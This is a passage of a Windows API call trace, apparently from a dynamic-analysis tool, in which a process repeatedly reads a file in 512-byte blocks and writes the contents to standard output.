0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.073] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.073] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.074] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.074] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.075] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.075] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.076] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.076] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.077] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.077] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.078] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.078] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.079] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.080] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.080] GetFileType (hFile=0x50) returned 0x1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, 